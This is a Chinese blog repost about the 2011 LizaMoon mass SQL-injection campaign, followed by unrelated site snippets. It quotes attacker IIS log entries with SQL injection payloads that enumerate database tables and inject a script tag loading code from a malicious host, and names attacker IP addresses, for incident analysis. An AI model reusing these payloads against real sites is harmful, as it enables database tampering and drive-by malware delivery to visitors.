lizamoon.com挂马解决办法

最新推荐文章于 2015-09-14 00:27:14 发布
最新推荐文章于 2015-09-14 00:27:14 发布
阅读量91 收藏
点赞数
原文链接:http://www.cnblogs.com/Safe3/archive/2011/04/04/2005283.html
版权

  国外安全厂商Websense最近发布警报称,一种名为“丽莎月亮(英文名:LizaMoon)”的SQL注入式黑客攻击正在席卷全球。短短数日内,受攻击的网页数量已迅猛增长到1030000个(截至4月2日10点),外媒报道称其“势如海啸爆发”,就连苹果等知名公司的网站也名列其中。同时,遭到“丽莎月亮”影响的中文网页数量也已达到46800个

  • 几个可疑IP: 95.64.9.18(来自罗马尼亚), 91.217.162.45(来自乌克兰,著名的邪恶网络) 
  • 网友提供珍贵的IISLog(进行入侵鉴识时,这是超重要的线索) 

    2011-03-11 16:34:45 W3SVC1746246233 *MYSERVERIP* GET /dir/linkdetail.aspx id=11011+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+where+TABLE_NAME+not+in+(SELECT+TOP+0+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES))-- 80 - 91.217.162.45 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) 500 0 0 

    Doc.asp?id=PU12731+update+gCategoriasHistoricoTiposDescripciones+set+Descripcion=REPLACE(cast(Descripcion+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) ....省略, 用CHR(nn)一个字符一个字符组出</title><script src=httq:// lazemoon .com / ur . php></script>…%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- - 95.64.9.18 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) - 302 498 

    2011-03-29 17:56:49 <<my server ip address>> GET /<<pagename>>.asp prod=MG0011'+update+tblMembers+set+Forename=REPLACE(cast(Forename+as+varchar(8000)),cast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105) ....省略, 用CHR(nn)一个字符一个字符组出</title><script src=httq:// lazemoon .com / ur . php></script>… %2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)+as+varchar(8)))-- 80 - 95.64.9.18 HTTP/1.1 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20030624+Netscape/7.1+(ax) 

 

解决方法

1.下载web杀毒软件,地址http://www.safe3.com.cn/works/884981847/view.aspx,使用挂马清除功能清除数据库中挂马字段数据。

2.下载并安装Safe3 Web应用防火墙保护网站,地址http://www.safe3.com.cn/works/271360615/view.aspx

 

3.大功告成。

转载于:https://www.cnblogs.com/Safe3/archive/2011/04/04/2005283.html

weixin_30788239
关注
HELLXMAN SQL Injection(丽莎月亮注入)手法详解
weixin_33804990的博客
01-02 205
那天在Silic Group核心群看到诸位大黑阔们在讨论,后来看Q群里的一位成员在我MSN讨论群里跟土耳其一个朋友要lizamoon的***脚本,我才知道有这么回事。一开始确实没打算写lizamoon,因为这个东西在圈内其实根本就不算什么,大牛们看完我写的这篇文章估计都该笑了,根本就不是什么高深技术,就是用注入来挂马而已,写了脚本批量扫批量挂,虽然暂时还不知道此次挂马的是哪位...
LizaMoon: Stored XSS via SQL Injection
weixin_34051201的博客
11-09 114
Blended Attacks More and more of today's web application attacks are leveraging multiple weaknesses, vulnerabilities and attack methods in order to achieve a desired exploitatio...
Analysis of LizaMoon: Stored XSS via SQL Injection
weixin_30367169的博客
06-03 156
Blended Attacks More and more of today's web application attacks are leveraging multiple weaknesses, vulnerabilities and attack methods in order to achieve a desired exploitation outcome. It is be...
《对话IT》第三期:如何应对“丽莎月亮”SQL注入挂马***
weixin_34186950的博客
04-11 47
《对话IT》第三期:如何应对“丽莎月亮”SQL注入挂马*** 2011年3月,一个被命名为LizaMoon的(SQL InjectionSQL注入***席卷全球,许多网站遭受***,网页内容中被塞了lizamoon字串,疑似挂马链接,透过Google查询 lizamoon. com关键词,被稙入恶意链接的URL数在两天内由28,000个急速增加到380,000个(...
中国区第一季度网络安全威胁报告
亚信安全-云安全博客
04-27 2650
本季度趋势科技在中国区发现新的未知病毒约13万种。截止2011.3.31日中国区传统病毒码7.940.60可检测病毒数量已超过340万种。 新增的病毒类型最多的仍然为木马(TROJ),木马大部分有盗号的特性。木马的比其他类型的电脑病毒更加能够直接的使病毒制造者获益 。在经济利益的促使下,更多病毒制造者选择编写木马程序。
SQL注入专题
weixin_30847865的博客
09-06 53
首页技术频道51CTO旗下网站地图 社区:论坛博客下载读书更多 登录注册 对搜狐、网易和TOM三大门户网站的SQL注入漏洞检测 笔者对搜狐及TOM和网易这三大门户网站作了注入攻击检测,发现同样存在明显的注入漏洞,安全性很糟糕。首先,来看看搜狐网站,搜狐网站上的动态网页大部分是采用PHP语言编写的,同样注入也很多。例如...[了...
SQL_Injection_Base_by_Silic读书摘要
weixin_33940102的博客
09-14 257
摘自:《SQL_Injection_Base_by_Silic》php网站:/**/、/*asdfa*/可替换空格猜表段:id=0/*abc*/union/*aa*/select/*asdf*/1,2,3,4,5/*id=-11/**/union/*aa*/select/*asdf*/1,2,3,4,5/*id=123/*abc*/and/*a*/1=2/**/union/*...
SQL字段类型text执行replace
webnoties的专栏
12-09 1116
UPDATE    outhouseSET              csshuoming = REPLACE(cast(csshuoming as   varchar(8000)), '', ' ')
基于HTML和Java的2021年NBA球星信息管理系统设计源码
09-28
本项目是一款基于HTML和Java开发的NBA球星信息管理系统源码,共包含84个文件,涵盖23个Java源文件、23个JPG图片文件、10个ICO图标文件、9个HTML页面文件、5个属性文件、4个PNG图片文件、2个XML配置文件、2个SQL数据库文件、1个Git忽略文件和1个JAR库文件。该系统专注于管理2021年NBA球星的相关信息,旨在提供高效的信息管理解决方案。
基于IPv6的智能机器人园区异常情况监测系统,包括无线传感器网络、智能巡
09-28
基于IPv6的智能机器人园区异常情况监测系统,包括无线传感器网络、智能巡检机器人、监控数据服务器、主_ipv6intellmonitrsystem
广东省住房城乡建设厅注册类相关系统整合及数据治理项目需求Word(26页).doc
09-28
数据治理是确保数据准确性、可靠性、安全性、可用性和完整性的体系和框架。它定义了组织内部如何使用、存储、保护和共享数据的规则和流程。数据治理的重要性随着数字化转型的加速而日益凸显,它能够提高决策效率、增强业务竞争力、降低风险,并促进业务创新。有效的数据治理体系可以确保数据在采集、存储、处理、共享和保护等环节的合规性和有效性。 数据质量管理是数据治理中的关键环节,它涉及数据质量评估、数据清洗、标准化和监控。高质量的数据能够提升业务决策的准确性,优化业务流程,并挖掘潜在的商业价值。随着大数据和人工智能技术的发展,数据质量管理在确保数据准确性和可靠性方面的作用愈发重要。企业需要建立完善的数据质量管理和校验机制,并通过数据清洗和标准化提高数据质量。 数据安全与隐私保护是数据治理中的另一个重要领域。随着数据量的快速增长和互联网技术的迅速发展,数据安全与隐私保护面临前所未有的挑战。企业需要加强数据安全与隐私保护的法律法规和技术手段,采用数据加密、脱敏和备份恢复等技术手段,以及加强培训和教育,提高安全意识和技能水平。 数据流程管理与监控是确保数据质量、提高数据利用率、保护数据安全的重要环节。有效的数据流程管理可以确保数据流程的合规性和高效性,而实时监控则有助于及时发现并解决潜在问题。企业需要设计合理的数据流程架构,制定详细的数据管理流程规范,并运用数据审计和可视化技术手段进行监控。 数据资产管理是将数据视为组织的重要资产,通过有效的管理和利用,为组织带来经济价值。数据资产管理涵盖数据的整个生命周期,包括数据的创建、存储、处理、共享、使用和保护。它面临的挑战包括数据量的快速增长、数据类型的多样化和数据更新的迅速性。组织需要建立完善的数据管理体系,提高数据处理和分析能力,以应对这些挑战。同时,数据资产的分类与评估、共享与使用规范也是数据资产管理的重要组成部分,需要制定合理的标准和规范,确保数据共享的安全性和隐私保护,以及建立合理的利益分配和权益保障机制。
Umi-OCR文字识别小软件,适用于windows系统
最新发布
09-28
一款文字识别软件,识别精确,免费
自动锁螺丝机组装设备_三维3D设计图纸.zip
09-28
自动锁螺丝机组装设备_三维3D设计图纸.zip
基于数据库表模板的Java代码自动生成器设计源码
09-28
该项目是一款基于Java语言的数据库表模板式代码自动生成器源码,包含38个文件,涵盖17个JAR包、14个Java源文件、2个INI配置文件、1个Git忽略规则文件、1个Markdown文件、1个ZIP压缩文件、1个MF资源文件和1个VM虚拟机文件。该工具能够根据数据库表结构和提供的模板文件,自动生成各类Java代码文件,如类、配置文件和JSP页面,极大提升了开发效率,减少了重复劳动,适用于各种Java项目的快速开发。
ssm9293农家乐管理系统.zip
09-28
技术选型 【后端】:Java 【框架】:ssm 【前端】:vue/jsp 【JDK版本】:JDK1.8 【服务器】:tomcat7+ 【数据库】:mysql 5.7+ 包含:项目源码、数据库脚本、项目功能介绍文档等,该项目源码可作为毕设使用。 项目都经过严格调试,确保可以运行! 具体项目介绍可查看博主文章
基于JavaScript的校园闲置平台-QQ小程序源代码
09-28
本项目为校园闲置交易平台QQ小程序源代码,包含427个文件,涵盖92个JavaScript文件、83个微信小程序样式文件(wxss)、78个JSON配置文件、73个WXML模板文件、73个TypeScript文件、17个PNG图片文件、8个WXS组件文件、1个Git忽略规则文件、1个Markdown文件以及1个JPG图片文件。项目采用JavaScript和微信小程序技术构建,适用于校园内闲置物品的交易和共享。
基于Python、HTML、JavaScript、CSS的Taro(芋头)反馈系统设计源码
09-28
该系统是一款基于Python、HTML、JavaScript和CSS开发的Taro(芋头)反馈系统,包含53个文件,涵盖21个Python脚本、9个PNG图像、6个HTML页面、4个JavaScript脚本以及若干配置和文档文件。该系统旨在提供一个用户友好的反馈平台,适用于各种设备和场景。
热熔机_三维3D设计图纸.zip
09-28
热熔机_三维3D设计图纸.zip
音乐电平,分贝,播放器,wav,代码
09-28
vb实现的音乐播放器,支持音乐的实时音乐电平效果
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值